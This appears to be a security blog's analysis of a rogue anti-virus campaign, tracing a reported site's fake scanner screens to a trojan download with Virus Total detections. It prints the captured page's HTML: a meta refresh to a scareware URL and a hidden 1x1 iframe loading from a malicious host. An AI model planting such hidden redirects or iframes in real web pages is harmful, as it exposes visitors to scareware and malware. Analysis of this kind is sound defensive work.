Analysis of rogue anti virus software

MX Lab reported earlier in some blog articles about the circulation of a malware campaign that leads to rogue anti virus software and further infections of your computer in the following articles:

Resume emails with attached file Resume.html leads to rogue AV software
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

We just managed to get a real sample of the malware and a working web site that hosts the malicious scripts and fake anti virus screens. In a comment on one of our blog posts, a writer has delivered us the following URL hxxp://kidstylesource.com/x.html.

When we tried this one we got the iframe scripting that is used in this campaign:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://protectionreader.in/media/index.php?
xml=back&rnd=img&nid=151&hash=ecard&c=4" style="visibility: hidden;" height="1" width="1">
</iframe>

</body></html>

We soon got the following screen in our browser and a pop up window with the message that our system is infected. Oh, yes, we continue now to see what happens. Do not try this at home!

After clicking on OK we got a screen that starts scanning the computer system. The progress bar will advance very fast for such an anti virus scanner and the first alleged infections are found on your system.

A new popup will appear with a Windows Security Alert when the scan is finished. When we click on the button Remove all we got the option to download the file 164 kB large file antivirus.exe.

When submitting this file to Virus Total, 19 of the 42 AV engines did detect the trojan with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).

Virus Total permlink and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.